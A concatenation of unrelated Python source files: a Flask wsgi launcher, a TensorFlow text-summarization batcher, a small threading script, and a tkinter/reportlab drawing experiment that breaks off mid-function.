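#     number_of_arguments(functools.partial(compute, 1))  # -> 2
# For the partial, the bound positional argument is subtracted from the
# wrapped function's parameter count.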
class ShardedDDPOption(ExplicitEnum):
SIMPLE = "simple"
ZERO_DP_2 = "zero_dp_2"
ZERO_DP_3 = "zero_dp_3"
OFFLOAD = "offload"
AUTO_WRAP = "auto_wrap"
|
wsgi.py
|
import os
import sys
import logging
import threading
import gevent.monkey
import mongoengine
from app import app
import db
import worker
app.config['MONGODB_SETTINGS'] = {
'db': db.DATABASE_NAME,
'alias': db.DATABASE_ALIAS
}
@app.before_first_request
def setup_application():
mongoengine.connect(db.DATABASE_NAME, alias=db.DATABASE_ALIAS)
def build_application():
"""
Starts running the Flask application.
"""
logging.basicConfig(level=logging.DEBUG,
stream=sys.stderr,
format='%(asctime)s %(levelname)s - %(message)s')
gevent.monkey.patch_all()
t = threading.Thread(target=worker.main)
    t.daemon = True
t.start()
app.config['THREADED'] = True
if os.environ.get('WSGI_PRODUCTION', None) is not None:
app.config['PORT'] = 9000
else:
app.config['PORT'] = 5000
app.config['DEBUG'] = True
return app
if __name__ == '__main__':
app = build_application()
app.run(threaded=True,
debug=app.config.get('DEBUG', False),
port=app.config.get('PORT', 9000))
|
batcher.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
# Modifications Copyright 2017 Abigail See
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""This file contains code to process data into batches"""
import queue as Queue
from random import shuffle
from threading import Thread
import time
import numpy as np
import tensorflow as tf
import data
class Example(object):
"""Class representing a train/val/test example for text summarization."""
def __init__(self, article, abstract_sentences, vocab, hps):
"""Initializes the Example, performing tokenization and truncation to produce the encoder, decoder and target sequences, which are stored in self.
Args:
article: source text; a string. each token is separated by a single space.
abstract_sentences: list of strings, one per abstract sentence. In each sentence, each token is separated by a single space.
vocab: Vocabulary object
hps: hyperparameters
"""
self.hps = hps
# Get ids of special tokens
start_decoding = vocab.word2id(data.START_DECODING)
stop_decoding = vocab.word2id(data.STOP_DECODING)
# Process the article
article_words = article.split()
if len(article_words) > hps.max_enc_steps:
article_words = article_words[:hps.max_enc_steps]
self.enc_len = len(article_words) # store the length after truncation but before padding
self.enc_input = [vocab.word2id(w) for w in article_words] # list of word ids; OOVs are represented by the id for UNK token
# Process the abstract
abstract = ' '.join(abstract_sentences) # string
abstract_words = abstract.split() # list of strings
abs_ids = [vocab.word2id(w) for w in abstract_words] # list of word ids; OOVs are represented by the id for UNK token
# Get the decoder input sequence and target sequence
self.dec_input, self.target = self.get_dec_inp_targ_seqs(abs_ids, hps.max_dec_steps, start_decoding, stop_decoding)
self.dec_len = len(self.dec_input)
# If using pointer-generator mode, we need to store some extra info
if hps.pointer_gen:
# Store a version of the enc_input where in-article OOVs are represented by their temporary OOV id; also store the in-article OOVs words themselves
self.enc_input_extend_vocab, self.article_oovs = data.article2ids(article_words, vocab)
      # Get a version of the reference summary where in-article OOVs are represented by their temporary article OOV id
abs_ids_extend_vocab = data.abstract2ids(abstract_words, vocab, self.article_oovs)
# Overwrite decoder target sequence so it uses the temp article OOV ids
_, self.target = self.get_dec_inp_targ_seqs(abs_ids_extend_vocab, hps.max_dec_steps, start_decoding, stop_decoding)
# Store the original strings
self.original_article = article
self.original_abstract = abstract
self.original_abstract_sents = abstract_sentences
def get_dec_inp_targ_seqs(self, sequence, max_len, start_id, stop_id):
"""Given the reference summary as a sequence of tokens, return the input sequence for the decoder, and the target sequence which we will use to calculate loss. The sequence will be truncated if it is longer than max_len. The input sequence must start with the start_id and the target sequence must end with the stop_id (but not if it's been truncated).
Args:
sequence: List of ids (integers)
max_len: integer
start_id: integer
stop_id: integer
Returns:
inp: sequence length <=max_len starting with start_id
target: sequence same length as input, ending with stop_id only if there was no truncation
"""
inp = [start_id] + sequence[:]
target = sequence[:]
if len(inp) > max_len: # truncate
inp = inp[:max_len]
target = target[:max_len] # no end_token
else: # no truncation
target.append(stop_id) # end token
assert len(inp) == len(target)
return inp, target
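  # Worked example (illustrative, not part of the original code): with
  # sequence=[5, 6, 7], start_id=1, stop_id=2 and max_len=10 nothing is
  # truncated, so
  #     inp    = [1, 5, 6, 7]   # starts with start_id
  #     target = [5, 6, 7, 2]   # ends with stop_id
  # With max_len=3 both are cut to length 3 and target gets no stop_id:
  #     inp = [1, 5, 6], target = [5, 6, 7]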
def pad_decoder_inp_targ(self, max_len, pad_id):
"""Pad decoder input and target sequences with pad_id up to max_len."""
while len(self.dec_input) < max_len:
self.dec_input.append(pad_id)
while len(self.target) < max_len:
self.target.append(pad_id)
def pad_encoder_input(self, max_len, pad_id):
"""Pad the encoder input sequence with pad_id up to max_len."""
while len(self.enc_input) < max_len:
self.enc_input.append(pad_id)
if self.hps.pointer_gen:
while len(self.enc_input_extend_vocab) < max_len:
self.enc_input_extend_vocab.append(pad_id)
class Batch(object):
"""Class representing a minibatch of train/val/test examples for text summarization."""
def __init__(self, example_list, hps, vocab):
"""Turns the example_list into a Batch object.
Args:
example_list: List of Example objects
hps: hyperparameters
vocab: Vocabulary object
"""
self.pad_id = vocab.word2id(data.PAD_TOKEN) # id of the PAD token used to pad sequences
self.init_encoder_seq(example_list, hps) # initialize the input to the encoder
self.init_decoder_seq(example_list, hps) # initialize the input and targets for the decoder
self.store_orig_strings(example_list) # store the original strings
def init_encoder_seq(self, example_list, hps):
"""Initializes the following:
self.enc_batch:
numpy array of shape (batch_size, <=max_enc_steps) containing integer ids (all OOVs represented by UNK id), padded to length of longest sequence in the batch
self.enc_lens:
numpy array of shape (batch_size) containing integers. The (truncated) length of each encoder input sequence (pre-padding).
self.enc_padding_mask:
numpy array of shape (batch_size, <=max_enc_steps), containing 1s and 0s. 1s correspond to real tokens in enc_batch and target_batch; 0s correspond to padding.
If hps.pointer_gen, additionally initializes the following:
self.max_art_oovs:
maximum number of in-article OOVs in the batch
self.art_oovs:
list of list of in-article OOVs (strings), for each example in the batch
self.enc_batch_extend_vocab:
Same as self.enc_batch, but in-article OOVs are represented by their temporary article OOV number.
"""
# Determine the maximum length of the encoder input sequence in this batch
max_enc_seq_len = max([ex.enc_len for ex in example_list])
# Pad the encoder input sequences up to the length of the longest sequence
for ex in example_list:
ex.pad_encoder_input(max_enc_seq_len, self.pad_id)
# Initialize the numpy arrays
# Note: our enc_batch can have different length (second dimension) for each batch because we use dynamic_rnn for the encoder.
self.enc_batch = np.zeros((hps.batch_size, max_enc_seq_len), dtype=np.int32)
self.enc_lens = np.zeros((hps.batch_size), dtype=np.int32)
self.enc_padding_mask = np.zeros((hps.batch_size, max_enc_seq_len), dtype=np.float32)
# Fill in the numpy arrays
for i, ex in enumerate(example_list):
self.enc_batch[i, :] = ex.enc_input[:]
self.enc_lens[i] = ex.enc_len
for j in range(ex.enc_len):
self.enc_padding_mask[i][j] = 1
# For pointer-generator mode, need to store some extra info
if hps.pointer_gen:
# Determine the max number of in-article OOVs in this batch
self.max_art_oovs = max([len(ex.article_oovs) for ex in example_list])
# Store the in-article OOVs themselves
self.art_oovs = [ex.article_oovs for ex in example_list]
# Store the version of the enc_batch that uses the article OOV ids
self.enc_batch_extend_vocab = np.zeros((hps.batch_size, max_enc_seq_len), dtype=np.int32)
for i, ex in enumerate(example_list):
self.enc_batch_extend_vocab[i, :] = ex.enc_input_extend_vocab[:]
def init_decoder_seq(self, example_list, hps):
"""Initializes the following:
self.dec_batch:
numpy array of shape (batch_size, max_dec_steps), containing integer ids as input for the decoder, padded to max_dec_steps length.
self.target_batch:
numpy array of shape (batch_size, max_dec_steps), containing integer ids for the target sequence, padded to max_dec_steps length.
self.dec_padding_mask:
numpy array of shape (batch_size, max_dec_steps), containing 1s and 0s. 1s correspond to real tokens in dec_batch and target_batch; 0s correspond to padding.
"""
# Pad the inputs and targets
for ex in example_list:
ex.pad_decoder_inp_targ(hps.max_dec_steps, self.pad_id)
# Initialize the numpy arrays.
# Note: our decoder inputs and targets must be the same length for each batch (second dimension = max_dec_steps) because we do not use a dynamic_rnn for decoding. However I believe this is possible, or will soon be possible, with Tensorflow 1.0, in which case it may be best to upgrade to that.
self.dec_batch = np.zeros((hps.batch_size, hps.max_dec_steps), dtype=np.int32)
self.target_batch = np.zeros((hps.batch_size, hps.max_dec_steps), dtype=np.int32)
self.dec_padding_mask = np.zeros((hps.batch_size, hps.max_dec_steps), dtype=np.float32)
# Fill in the numpy arrays
for i, ex in enumerate(example_list):
self.dec_batch[i, :] = ex.dec_input[:]
self.target_batch[i, :] = ex.target[:]
for j in range(ex.dec_len):
self.dec_padding_mask[i][j] = 1
def store_orig_strings(self, example_list):
"""Store the original article and abstract strings in the Batch object"""
self.original_articles = [ex.original_article for ex in example_list] # list of strings
self.original_abstracts = [ex.original_abstract for ex in example_list] # list of strings
self.original_abstracts_sents = [ex.original_abstract_sents for ex in example_list] # list of lists of strings
class Batcher(object):
"""A class to generate minibatches of data. Buckets examples together based on length of the encoder sequence."""
BATCH_QUEUE_MAX = 100 # max number of batches the batch_queue can hold
def __init__(self, data_path, vocab, hps, single_pass):
"""Initialize the batcher. Start threads that process the data into batches.
Args:
data_path: tf.Example filepattern.
vocab: Vocabulary object
hps: hyperparameters
single_pass: If True, run through the dataset exactly once (useful for when you want to run evaluation on the dev or test set). Otherwise generate random batches indefinitely (useful for training).
"""
self._data_path = data_path
self._vocab = vocab
self._hps = hps
self._single_pass = single_pass
# print(self._hps.__getattr__('batch_size'))
# Initialize a queue of Batches waiting to be used, and a queue of Examples waiting to be batched
self._batch_queue = Queue.Queue(self.BATCH_QUEUE_MAX)
self._example_queue = Queue.Queue(self.BATCH_QUEUE_MAX * self._hps.batch_size)
# Different settings depending on whether we're in single_pass mode or not
if single_pass:
self._num_example_q_threads = 1 # just one thread, so we read through the dataset just once
self._num_batch_q_threads = 1 # just one thread to batch examples
self._bucketing_cache_size = 1 # only load one batch's worth of examples before bucketing; this essentially means no bucketing
self._finished_reading = False # this will tell us when we're finished reading the dataset
else:
self._num_example_q_threads = 16 # num threads to fill example queue
self._num_batch_q_threads = 4 # num threads to fill batch queue
self._bucketing_cache_size = 100 # how many batches-worth of examples to load into cache before bucketing
# Start the threads that load the queues
self._example_q_threads = []
for _ in range(self._num_example_q_threads):
self._example_q_threads.append(Thread(target=self.fill_example_queue))
self._example_q_threads[-1].daemon = True
self._example_q_threads[-1].start()
self._batch_q_threads = []
for _ in range(self._num_batch_q_threads):
self._batch_q_threads.append(Thread(target=self.fill_batch_queue))
self._batch_q_threads[-1].daemon = True
self._batch_q_threads[-1].start()
# Start a thread that watches the other threads and restarts them if they're dead
if not single_pass: # We don't want a watcher in single_pass mode because the threads shouldn't run forever
self._watch_thread = Thread(target=self.watch_threads)
self._watch_thread.daemon = True
self._watch_thread.start()
def next_batch(self):
"""Return a Batch from the batch queue.
If mode='decode' then each batch contains a single example repeated beam_size-many times; this is necessary for beam search.
Returns:
batch: a Batch object, or None if we're in single_pass mode and we've exhausted the dataset.
"""
# If the batch queue is empty, print a warning
if self._batch_queue.qsize() == 0:
tf.logging.warning('Bucket input queue is empty when calling next_batch. Bucket queue size: %i, Input queue size: %i', self._batch_queue.qsize(), self._example_queue.qsize())
if self._single_pass and self._finished_reading:
tf.logging.info("Finished reading dataset in single_pass mode.")
return None
batch = self._batch_queue.get() # get the next Batch
return batch
def fill_example_queue(self):
"""Reads data from file and processes into Examples which are then placed into the example queue."""
input_gen = self.text_generator(data.example_generator(self._data_path, self._single_pass))
while True:
try:
(article, abstract) = next(input_gen) # read the next example from file. article and abstract are both strings.
except StopIteration: # if there are no more examples:
tf.logging.info("The example generator for this example queue filling thread has exhausted data.")
if self._single_pass:
tf.logging.info("single_pass mode is on, so we've finished reading dataset. This thread is stopping.")
self._finished_reading = True
break
else:
raise Exception("single_pass mode is off but the example generator is out of data; error.")
abstract_sentences = [sent.strip() for sent in data.abstract2sents(abstract)] # Use the <s> and </s> tags in abstract to get a list of sentences.
example = Example(article, abstract_sentences, self._vocab, self._hps) # Process into an Example.
self._example_queue.put(example) # place the Example in the example queue.
def fill_batch_queue(self):
"""Takes Examples out of example queue, sorts them by encoder sequence length, processes into Batches and places them in the batch queue.
In decode mode, makes batches that each contain a single example repeated.
"""
while True:
if self._hps.mode != 'decode':
# Get bucketing_cache_size-many batches of Examples into a list, then sort
inputs = []
for _ in range(self._hps.batch_size * self._bucketing_cache_size):
inputs.append(self._example_queue.get())
inputs = sorted(inputs, key=lambda inp: inp.enc_len) # sort by length of encoder sequence
# Group the sorted Examples into batches, optionally shuffle the batches, and place in the batch queue.
batches = []
for i in range(0, len(inputs), self._hps.batch_size):
batches.append(inputs[i:i + self._hps.batch_size])
if not self._single_pass:
shuffle(batches)
for b in batches: # each b is a list of Example objects
self._batch_queue.put(Batch(b, self._hps, self._vocab))
else: # beam search decode mode
ex = self._example_queue.get()
b = [ex for _ in range(self._hps.batch_size)]
self._batch_queue.put(Batch(b, self._hps, self._vocab))
def watch_threads(self):
"""Watch example queue and batch queue threads and restart if dead."""
while True:
time.sleep(60)
for idx,t in enumerate(self._example_q_threads):
if not t.is_alive(): # if the thread is dead
tf.logging.error('Found example queue thread dead. Restarting.')
new_t = Thread(target=self.fill_example_queue)
self._example_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
for idx,t in enumerate(self._batch_q_threads):
if not t.is_alive(): # if the thread is dead
tf.logging.error('Found batch queue thread dead. Restarting.')
new_t = Thread(target=self.fill_batch_queue)
self._batch_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
def text_generator(self, example_generator):
"""Generates article and abstract text from tf.Example.
Args:
example_generator: a generator of tf.Examples from file. See data.example_generator"""
while True:
e = next(example_generator) # e is a tf.Example
try:
article_text = e.features.feature['article'].bytes_list.value[0].decode() # the article text was saved under the key 'article' in the data files
abstract_text = e.features.feature['abstract'].bytes_list.value[0].decode() # the abstract text was saved under the key 'abstract' in the data files
except ValueError:
tf.logging.error('Failed to get article or abstract from example')
continue
if len(article_text)==0: # See https://github.com/abisee/pointer-generator/issues/1
tf.logging.warning('Found an example with empty article text. Skipping it.')
else:
yield (article_text, abstract_text)
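# Minimal usage sketch (not part of the original file; the vocab/data paths and the
# 'hps' object are hypothetical placeholders supplied by the surrounding training code):
#   vocab = data.Vocab(vocab_path, 50000)
#   batcher = Batcher(data_path, vocab, hps, single_pass=False)
#   batch = batcher.next_batch()  # blocks until the background threads have filled the queue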
|
plugin.py
|
import threading, time
def agent():
while True:
print("running agent in thread")
time.sleep(1)
print("done")
threading.Thread(target=agent).start()
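# Note (a sketch, not part of the original script): agent() loops forever, so the
# "done" print above is never reached and the program never exits on its own.
# A hypothetical variant that lets the main program exit would mark the thread as a daemon:
#   threading.Thread(target=agent, daemon=True).start()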
|
pruebas_canvas.py
|
from tkinter import *
from reportlab import *
from reportlab.lib.pagesizes import letter
from reportlab.pdfgen import canvas
from reportlab.lib.colors import tan, black, green
from reportlab.lib.units import inch
from reportlab.lib.units import mm
import tkinter.colorchooser as colorchooser
import math
import time
import threading
import os
os.chdir('..')
from mbarete import geometria,calculadora
global raiz,cu, largo,fondo,fondor,fondot,valor,labelcrono,textos,alto,ancho
global baseRadio,altura,revolucion,rotorRadio,fondo,angulos
class btnCanvas(object):
"""botones creados en el lienzo de canvas"""
def __init__(self, arg):
super(btnCanvas, self).__init__()
self.arg = arg
"""
Button(
self.widgets[myWidget['padre']]['widget'],
text=myWidget['text'],
width=myWidget['width'] if myWidget['width'] else None,
bg=myWidget['bgColor'],
fg=myWidget['fontColor'],
font=(myWidget['fontType'],myWidget['fontSize']),
command=lambda:threading.Thread(target=self.command[mywidget['name']][0],args=self.command[mywidget['name']][1]).start()
)
"""
largo=800
alto=largo
ancho=650
fondor= '#00001a'
fondot='#408080'
fondo='#f3a80c'
valor='texto de ejemplo'
def strToUnicode(strng):
unicod=""
for x in str(strng):
unicod += r" "+str(ord(x))
return unicod.strip()
def unicodeToStr(unicod):
strng=""
if unicod.strip()=="":
return unicod
else:
for x in unicod.split(" "):
strng += str(chr(int(x)))
return strng.strip()
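# Round-trip example (sketch): strToUnicode('abc') returns '97 98 99' and
# unicodeToStr('97 98 99') returns 'abc' (space-separated code points).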
escala11={
'Arial':{
' ':6.0,
'_':8.0,
'.':3.75,
'a':7.833,
'b':7.833,
'c':7.833,
'd':7.833,
'e':7.833,
'f':3.954,
'g':7.833,
'h':7.833,
'i':2.809,
'j':3.5,
'k':7.0,
'l':2.809,
'm':13.0,
'n':7.833,
'ñ':7.833,
'o':7.833,
'p':7.833,
'q':7.833,
'r':6.0,
's':7.769,
't':3.954,
'u':7.833,
'v':6.5,
'w':11.0,
'x':6.7,
'y':6.7,
'z':7.6
}
}
listaunicode={}
for letra in escala11['Arial']:
listaunicode.setdefault(strToUnicode(letra),escala11['Arial'][letra])
def strPixel(string,fontType='Arial',fontSize=11):
escala={'Arial':{'32': 6.0, '95': 8.0, '46': 3.75, '97': 7.833, '98': 7.833, '99': 7.833, '100': 7.833, '101': 7.833, '102': 3.954, '103': 7.833, '104': 7.833, '105': 2.809, '106': 3.5, '107': 7.0, '108': 2.809, '109': 13.0, '110': 7.833, '241': 7.833, '111': 7.833, '112': 7.833, '113': 7.833, '114': 6.0, '115': 7.769, '116': 3.954, '117': 7.833, '118': 6.5, '119': 11.0, '120': 6.7, '121': 6.7, '122': 7.6}}
longitud=0
for letra in string:
longitud+=escala[fontType][strToUnicode(letra)]
return longitud+1
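# Example (sketch): strPixel('hola') sums the per-character Arial-11 widths
# 7.833 + 7.833 + 2.809 + 7.833 and adds 1, giving roughly 27.3 pixels.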
def crono(mini=0,maxi=5,step=1,ti='seg'):
tiempo={'seg':1,'miliseg':0.001}
t=tiempo[ti]
for x in range(mini+1,maxi+1,step):
labelcrono.config(text=str(x))
raiz.update()
time.sleep(t)
def circulin(radio=10,Cx=10,Cy=10,grado0=0,gradoF=360):
r=float(radio)
centroX=float(Cx)
centroY=float(Cy)
g0=grado0
gf=gradoF
if math.fabs(grado0-gradoF)>=360:
circulo=(centroX+math.cos(math.radians(float(g0)))*r,centroY+math.sin(math.radians(float(g0)))*r)
else:
circulo=(centroX,centroY)
circulo+=(centroX+math.cos(math.radians(float(g0)))*r,centroY+math.sin(math.radians(float(g0)))*r)
for g in range(g0,gf,1):
rad=math.radians(float(g))
circulo+=(centroX+math.cos(rad)*r,centroY-math.sin(rad)*r)
cu.create_polygon(circulo,fill=fondot,outline=fondo)
def polig(xplace,yplace,ancho,alto,radio=10,text="",fontSize=11,fontType='Arial',fill='#ff0000',outline='#ff00f0',fontColor='#ffffff',alcance=100):
if (radio*2<=alto) and (radio*2<=ancho):
r=float(radio)
else:
r=float(int(alto/2)) if alto<ancho else float(int(ancho/2))
if r>0:
punto1=(xplace,yplace+r)
centroX=xplace+r
centroY=yplace+r
for g in range(180,90,-1):
rad=math.radians(float(g))
punto1+=(centroX+math.cos(rad)*r,centroY-math.sin(rad)*r)
punto1+=(xplace+r,yplace)
else:
punto1=(xplace,yplace)
if r>0:
punto2=(xplace+ancho-r,yplace)
centroX=xplace+ancho-r
centroY=yplace+r
for g in range(90,0,-1):
rad=math.radians(float(g))
punto2+=(centroX+math.cos(rad)*r,centroY-math.sin(rad)*r)
punto2+=(xplace+ancho,yplace+r)
else:
punto2=(xplace+ancho,yplace)
if r>0:
punto3=(xplace+ancho,yplace+alto-r)
centroX=xplace+ancho-r
centroY=yplace+alto-r
for g in range(0,-90,-1):
rad=math.radians(float(g))
punto3+=(centroX+math.cos(rad)*r,centroY-math.sin(rad)*r)
punto3+=(xplace+ancho-r,yplace+alto)
else:
punto3=(xplace+ancho,yplace+alto)
if r>0:
punto4=(xplace+r,yplace+alto)
centroX=xplace+r
centroY=yplace+alto-r
for g in range(-90,-180,-1):
rad=math.radians(float(g))
punto4+=(centroX+math.cos(rad)*r,centroY-math.sin(rad)*r)
punto4+=(xplace,yplace+alto-r)
else:
punto4=(xplace,yplace+alto)
puntos=punto1+punto2+punto3+punto4
cu.create_polygon(puntos,fill=fill,outline=outline)
if text and (len(text)*7):
cu.create_text(xplace+int(ancho/2), yplace+int(alto/2),fill=fontColor,font=(fontType,fontSize), text=str(text))
cu.create_text(alcance+10, yplace+int(alto/2),fill=fontColor,font=(fontType,fontSize), text=str(len(text))+' , '+str(ancho)+' , '+str(float(ancho)/float(len(text)))[0:5])
def aspas(x=10,y=10,dividir=120,baseRadio=100.0,altura=100.0,revolucion=360,rotorRadio=5.0,fondo=60):
geo=geometria()
xR=[0.0]
yR=[rotorRadio]
zR=[-1*(fondo/baseRadio)*(baseRadio-rotorRadio)]
xA=[0.0]
yA=[baseRadio]
zA=[0.0]
tanA=baseRadio/altura
for ang in range(1,revolucion,1):
if (((altura-((altura/float(revolucion))*float(ang)))*tanA) >= rotorRadio):
rad=math.radians(float(ang))
zA.append((altura/float(revolucion))*float(ang))
p=((altura-zA[-1])*tanA)
yA.append(p*math.cos(rad))
xA.append(p*math.sin(rad))
zR.append((-1*(((fondo+zA[-1])/p)*(p-rotorRadio))+zA[-1]))
yR.append((rotorRadio)*math.cos(rad))
xR.append((rotorRadio)*math.sin(rad))
fin=ang
xOut=[0]
yOut=[geo.dis([xR[0],yR[0],zR[0]],[xA[0],yA[0],zA[0]])]
xIn =[0]
yIn =[0]
for n in range(1,fin+1,1):
A=[xA[n-1],yA[n-1],zA[n-1]] # point already placed on the plane
B=[xR[n-1],yR[n-1],zR[n-1]] # origin point already on the plane
C=[xA[n],yA[n],zA[n]] # point that will be added to the plane
xO=geo.dis(geo.alt(C,A,B),C)
yO=geo.dis(geo.alt(C,A,B),B)
#print(math.degrees(angRad([0,1,0],resta([xIn[-1],yIn[-1],0],[xOut[-1],yOut[-1],0]))))
rot= -1*math.fabs(geo.angRad([0,1,0],geo.resta([xIn[-1],yIn[-1],0],[xOut[-1],yOut[-1],0])))
xRot, yRot=geo.rotar(rot,[xO,yO,0])
xTras, yTras=geo.trasladar([xIn[-1],yIn[-1],0],[xRot,yRot,0])
yOut.append(yTras)
xOut.append(xTras)
A=[xA[n],yA[n],zA[n]]
B=[xR[n-1],yR[n-1],zR[n-1]]
C=[xR[n],yR[n],zR[n]]
xO= geo.dis(geo.alt(C,A,B),C)
yO= geo.dis(geo.alt(C,A,B),B) if geo.dis(geo.alt(C,A,B),A)<geo.dis(A,B) else geo.dis(geo.alt(C,A,B),B)*(-1)
rot= -1*math.fabs(geo.angRad([0,1,0],geo.resta([xIn[-1],yIn[-1],0],[xOut[-1],yOut[-1],0])))
xRot, yRot=geo.rotar(rot,[xO,yO,0])
xTras, yTras=geo.trasladar([xIn[-1],yIn[-1],0],[xRot,yRot,0])
yIn.append(yTras)
xIn.append(xTras)
angulo = [(n, xOut[n]+(x), yOut[n]+(y), xIn[n]+(x), yIn[n]+(y), zR[n]+fondo) for n in range(0,len(xOut),dividir)]+[(fin, xOut[fin]+(x), yOut[fin]+(y), xIn[fin]+(x), yIn[fin]+(y), zR[fin]+fondo)]
poligono = [(xOut[n]+(x),yOut[n]+(y)) for n in range(0,len(xOut),1)]+[(xIn[n]+(x),yIn[n]+(y)) for n in range(len(xIn)-1,-1,-1)]+[(xOut[0]+x,yOut[0]+y)]
return poligono, angulo, fin
def penciltip(debug=1):
from reportlab.lib.colors import tan, black, green
from reportlab.lib.units import mm
from reportlab.pdfgen import canvas
canvas = canvas.Canvas("plano.pdf", pagesize=letter)
canvas.setLineWidth(.3)
canvas.setFont('Helvetica', 8)
baseRadio=100.0
profundidad=60.0
angulos=120
altura=100.0
revolucion=360
rotorRadio=5.0
puntos,angulo,fin = aspas(x=10,y=int((780-(geometria().hypotenusa(baseRadio,profundidad)*mm))/mm),dividir=angulos,baseRadio=baseRadio,altura=altura,revolucion=revolucion,rotorRadio=rotorRadio,fondo=profundidad)
#canvas.line(480,747,580,747)
canvas.drawString(10,70,'Plano: ')
canvas.drawString(10,60,'Giro real: '+str(fin)+" grados")
canvas.drawString(10,50,'Radio Base: '+str(baseRadio)+" mm")
canvas.drawString(10,40,'Radio Rotor: '+str(rotorRadio)+" mm")
canvas.drawString(10,30,'Fondo: '+str(profundidad)+" mm")
canvas.drawString(10,20,'Altura: '+str(altura)+" mm")
canvas.drawString(10,10,'Giro Especulado: '+str(revolucion)+" grados")
canvas.setLineWidth(3)
canvas.drawString(10.0*mm,780,'100mm')
canvas.line(10.0*mm, 780, 110.0*mm, 780)
canvas.line(5.0*mm, 250*mm, 5.0*mm, 150*mm)
canvas.setLineWidth(.3)
for g in range(0,len(puntos)-1,1):
canvas.line(puntos[g][0]*mm, puntos[g][1]*mm, puntos[g+1][0]*mm, puntos[g+1][1]*mm)
canvas.setLineWidth(3)
for g in range(0,len(angulo),1):
canvas.line(angulo[g][1]*mm, angulo[g][2]*mm, angulo[g][3]*mm, angulo[g][4]*mm)
canvas.drawString(angulo[g][1]*mm+((angulo[g][1]*mm-angulo[g][3]*mm)/100), angulo[g][2]*mm+((angulo[g][2]*mm-angulo[g][4]*mm)/100),'_'+str(angulo[g][0])+'grados, altura: '+str( str(angulo[g][5]) if (6 > len(str(angulo[g][5]))) else str(angulo[g][5])[:5] )+'mm')
#canvas.drawString(puntos[int((len(puntos)-2)/2)][0]*mm, puntos[int((len(puntos)-2)/2)][1]*mm,'_'+str(int((len(puntos)-1)/2))+'grados')
canvas.save()
print("Ok")
#penciltip()
def escalarHex(h="#ffffff",factor=1.0):
escala={'0':0,'1':1,'2':2,'3':3,'4':4,'5':5,'6':6,'7':7,'8':8,'9':9,'a':10,'b':11,'c':12,'d':13,'e':14,'f':15}
RR=int(float((escala[h[1:3][0]])*16+(escala[h[1:3][1]]))*factor)
GG=int(float((escala[h[3:5][0]])*16+(escala[h[3:5][1]]))*factor)
BB=int(float((escala[h[5:][0]])*16+(escala[h[5:][1]]))*factor)
#print(str(hex(RR)),str(hex(GG)),str(hex(BB)))
ret='#'+("" if RR>15 else "0")+str(hex(RR))[2:]+("" if GG>15 else "0")+str(hex(GG))[2:]+("" if BB>15 else "0")+str(hex(BB))[2:]
#print(RR,GG,BB,ret[0:7])
return ret[0:7]
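# Example (sketch): escalarHex('#808080', 0.5) scales each RGB channel by the factor
# and returns '#404040'. Factors above 1 can push a channel past 0xff, in which case
# the result is simply truncated to 7 characters.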
import builtins
global correo,cu,labelcrono,raiz,textos,correoVar,ciVar,totalVar,timbreVar,v
def caja():
#print(dir(memoryview.tobytes))
#print(dir(globals))
#print(dir(builtins))
def len_string(string,fontType='Arial',fontSize=11):
longitud={
'Arial':{
'A':9.0,'a':8.0,'b':8.0,'c':8.0,'d':8.0,'e':8.0,'f':4.0,
'g':8.0,'h':8.0,'i':3.0,'j':3.0,'k':7.0,'l':3.0,'m':13.0,
'n':8.0,'ñ':8.0,'o':8.0,'p':8.0,'q':8.0,'r':5.0,'s':8.0,
't':4.0,'u':8.0,'v':7.0,'w':11.0,'x':7.0,'y':7.0,'z':8.0,
'.':4.0,'B':10.0,'C':11.0,'D':11.0,'E':10.0,'F':9.0,'G':11.0,
'H':10.0,'I':3.0,'J':7.0,'K':10.0,'L':8.0,'M':11.0,'N':10.0,
'Ñ':10.0,'O':12.0,'P':10.0,'Q':12.0,'R':11.0,'S':10.0,'T':9.0,
'U':10.0,'V':9.0,'W':15,'X':9.0,'Y':9.0,'Z':8.0,'0':8.0,
'1':8.0,'2':8.0,'3':8.0,'4':8.0,'5':8.0,'6':8.0,'7':8.0,'8':8.0,'9':8.0
}
}
l=0.0
for c in string:
if c in longitud[fontType]:
l+=longitud[fontType][c]
else:
l += 8.0
return l
global correo,cu,labelcrono,raiz,textos,correoVar,ciVar,totalVar,timbreVar,widgets,v
def validar(name,valido,*arg):
#print(*arg)
# 'highlightbackground': border color when the entry is not focused
# 'highlightcolor': border color when the entry is focused
# 'highlightthickness': border thickness
if name in v:
ret=v[name].get()
#print(ret)
if valido=="correo" and ret:
if "@" in ret and (ret.split('@')[-1] in ['gmail.com','es','edu']):
widgets[name].config(highlightbackground='green', highlightcolor= "green",highlightthickness=2)
else:
widgets[name].config(highlightbackground='red', highlightcolor= "red",highlightthickness=5)
def dibujar(v,alto=800,ancho=650):
polig(0,0,ancho,alto,radio=5,fill='#ff0000',outline='#ff00f0')
fontType=v['fontType'].get()
fontSize=v['fontSize'].get()
repeticiones=v['repeticiones'].get()
letra=v['letra'].get()
desde=v['desde'].get()
hasta=v['hasta'].get()
pasos=v['pasos'].get()
ySuma=200
for x in range(desde,hasta,pasos):
#polig(50,ySuma,int(strPixel("abc defg_hijklmnñopqrstuvwxyz....."[0:x])),20,radio=5,text=str("abc defg_hijklmnñopqrstuvwxyz.....")[0:x])
polig(50,ySuma,x,20,radio=5,text=letra*repeticiones,fontSize=fontSize,fontType=fontType,fill='#0f0f0f',outline='#010101',alcance=int(ancho*0.8))
#circulin(radio=10,Cx=25,Cy=ySuma,grado0=0,gradoF=int(360/(34-x)))
ySuma += 30
miFrameinicio.configure(width = ancho, height=ySuma+100)
cu.configure(width = ancho, height=ySuma+100)
raiz.update()
def dibujarExacta(v,alto=800,ancho=650):
polig(0,0,ancho,alto,radio=5,fill='#ff0000',outline='#ff00f0')
fontType=v['fontType'].get()
fontSize=v['fontSize'].get()
repeticiones=v['repeticiones'].get()
letra=v['letra'].get()
desde=v['desde'].get()
hasta=v['hasta'].get()
pasos=v['pasos'].get()
ySuma=200
for x in range(desde,hasta,pasos):
